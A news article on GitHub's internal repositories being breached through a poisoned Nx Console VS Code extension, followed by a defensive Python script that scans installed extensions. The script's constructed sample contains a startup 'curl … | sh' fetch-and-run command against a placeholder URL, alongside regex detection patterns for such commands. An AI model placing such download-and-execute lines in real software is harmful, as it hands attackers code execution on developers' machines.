GitHub’s Internal Repositories Breached via Malicious Nx Console VS Code Extension

GitHub on Wednesday officially confirmed that the breach of its internal repositories was the result of a compromised employee device that installed a poisoned version of the Nx Console Microsoft Visual Studio Code (VS Code) extension.
The development comes as the Nx team revealed that the extension, nrwl.angular-console, was compromised after its developers’ systems were breached in the wake of the recent TanStack supply chain attack. Other companies affected by the TanStack compromise include OpenAI, Mistral AI, and Grafana Labs.
“We have no evidence of an impact on customer information stored outside of GitHub’s internal repositories, such as our customers’ businesses, organizations, and repositories,” said Alexis Wales, GitHub’s Chief Information Security Officer, in a statement.
“Some of GitHub’s internal repositories contain information from customers, for example, quotes from support interactions. If any impact is detected, we will notify customers through established incident response and notification channels.”
The attack is said to have allowed the threat actor, a cybercriminal group known as TeamPCP, to exfiltrate around 3,800 repositories. GitHub said it took steps to contain the incident, including rotating sensitive secrets, and added that it continues to monitor the situation for further activity.
In a post on X, Jeff Cross, founder of Narwhal Technologies, the company behind nx.dev, said, “this incident shows that there needs to be some deep, very important changes in the way we and other maintainers need to think about getting developer tools and open source distribution.”
“We’re also starting discussions with other top open source maintainers about how we can work together on some of the deeper structural issues around software supply chain security. Many of the assumptions that the ecosystem has been operating under for years are no longer valid.”
In recent months, TeamPCP has quickly gained notoriety for large-scale software attacks, particularly going after widely used open source projects and security-dependent tools that developers rely on.
What is noteworthy here is that the trojanized version of the VS Code extension was live on the Visual Studio Marketplace for only 18 minutes (between 12:30 pm and 12:48 pm UTC on May 18, 2026). That short window was still enough for the attackers to distribute a payload capable of harvesting sensitive data from 1Password vaults, Anthropic Claude Code configuration, npm, GitHub, and Amazon Web Services (AWS).
“The extension looked and behaved like a normal Nx Console, but initially it used a silent shell command that downloaded and executed a hidden package from a commit posted on the official nrwl/nx GitHub site,” said OX Security researcher Nir Zadok. “This order was intended as a routine exercise to stop the MCP from being suspicious.”
The interconnected nature of modern software has allowed TeamPCP to run a self-sustaining cycle of new compromises. The pattern driving this cycle is as deceptively simple as it is insulting: hack one trusted tool, steal credentials from the systems of the developers who install it, and use those credentials to break into the next legitimate tool.
“All the popular extended markets go with automatic updates. VS Code, Cursor, the whole system,” says Aikido security researcher Raphael Silva. “The thinking makes sense on its own, because most developers don’t update anything manually, so giving it up means a long tail of programmers using old, vulnerable code.”
“Exchanges stop making sense when you account for hostile/vulnerable publishers. Automatic updates give the attacker who controls the release a direct push to every machine that uses that extension. Markets do not set any update gate or waiting period between the time the update is published and when the installed clients pull it.”
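Because marketplaces push updates to every installed client with no waiting period, a defender's practical fallback is to audit what is already installed. The script below is an added example (not code from GitHub, Nx, OX Security or Aikido) that walks a VS Code extensions directory and flags extension JavaScript that both imports `child_process` and references a download-and-run pattern or a raw GitHub code URL, together with an `activationEvents` entry of `"*"` (activate at startup), which is the shape of behaviour the article describes. The sample extensions it scans are constructed in a temporary directory; the GitHub URL in the sample is a placeholder, not the real commit.

```python
"""Heuristic audit of installed VS Code extensions for remote fetch-and-execute
behaviour. Added example; not code from GitHub, Nx, OX Security or Aikido."""
import json
import re
import tempfile
from pathlib import Path

# Heuristics, not proof of malice: legitimate extensions may spawn processes.
# We only flag child_process use combined with a fetch-into-shell pattern or a
# reference to raw code hosted on GitHub.
CHILD_PROCESS_RE = re.compile(
    r"""require\(\s*['"]child_process['"]\s*\)|from\s+['"]child_process['"]""")
FETCH_EXEC_RE = re.compile(
    r"""(curl|wget)\b[^'"\n]*\|\s*(sh|bash|zsh|node)\b"""
    r"""|(?:exec|execSync|spawn)\s*\(\s*['"`][^'"`]*(curl|wget)\b""")
REMOTE_REF_RE = re.compile(
    r"""https?://(raw\.githubusercontent\.com|github\.com/[^/\s'"]+/[^/\s'"]+/(?:raw|commit))""")


def scan_extension(ext_dir: Path) -> dict:
    """Return metadata and findings for one extension directory."""
    pkg_path = ext_dir / "package.json"
    pkg = json.loads(pkg_path.read_text()) if pkg_path.exists() else {}
    findings = []
    for js in sorted(ext_dir.rglob("*.js")):
        text = js.read_text(errors="ignore")
        has_cp = bool(CHILD_PROCESS_RE.search(text))
        fetch_exec = FETCH_EXEC_RE.search(text)
        remote = REMOTE_REF_RE.search(text)
        if has_cp and (fetch_exec or remote):
            findings.append({
                "file": str(js.relative_to(ext_dir)),
                "fetch_pipe_shell": bool(fetch_exec),
                "remote_code_ref": remote.group(0) if remote else None,
            })
    activation = pkg.get("activationEvents", [])
    return {
        "name": f"{pkg.get('publisher', '?')}.{pkg.get('name', '?')}",
        "version": pkg.get("version", "?"),
        "activation": activation,
        "activates_on_startup": "*" in activation or "onStartupFinished" in activation,
        "findings": findings,
    }


def scan_extensions_root(root: Path) -> list:
    """Scan every extension directory under root (e.g. ~/.vscode/extensions)."""
    return [scan_extension(d) for d in sorted(root.iterdir()) if d.is_dir()]


def build_demo_root() -> Path:
    """Constructed sample: one benign extension that runs a local linter, and
    one that shells out at startup to download and run a remote script."""
    root = Path(tempfile.mkdtemp())
    benign = root / "example.benign-linter-1.0.0"
    benign.mkdir()
    (benign / "package.json").write_text(json.dumps({
        "name": "benign-linter", "publisher": "example", "version": "1.0.0",
        "activationEvents": ["onLanguage:javascript"]}))
    (benign / "extension.js").write_text(
        "const { execSync } = require('child_process');\n"
        "exports.activate = () => execSync('npx eslint .');\n")

    suspicious = root / "example.suspicious-console-2.0.1"
    suspicious.mkdir()
    (suspicious / "package.json").write_text(json.dumps({
        "name": "suspicious-console", "publisher": "example", "version": "2.0.1",
        "activationEvents": ["*"]}))
    # Placeholder URL: EXAMPLE-ORG/EXAMPLE-REPO/COMMIT-PLACEHOLDER is not a real commit.
    (suspicious / "extension.js").write_text(
        "const { execSync } = require('child_process');\n"
        "exports.activate = () => execSync(\n"
        "  'curl -fsSL https://raw.githubusercontent.com/EXAMPLE-ORG/EXAMPLE-REPO/"
        "COMMIT-PLACEHOLDER/setup.sh | sh', { stdio: 'ignore' });\n")
    return root


if __name__ == "__main__":
    for result in scan_extensions_root(build_demo_root()):
        flag = "SUSPECT" if result["findings"] else "ok"
        print(f"{flag:8} {result['name']} {result['version']} "
              f"startup={result['activates_on_startup']} {result['findings']}")
```

Point `scan_extensions_root` at a real extensions directory to inventory a workstation; anything reported as SUSPECT deserves a manual read of the flagged file rather than automatic removal. The update-gating gap the researcher describes can be narrowed on the client side with VS Code's `extensions.autoUpdate` setting, which turns the marketplace push into a deliberate, reviewable action.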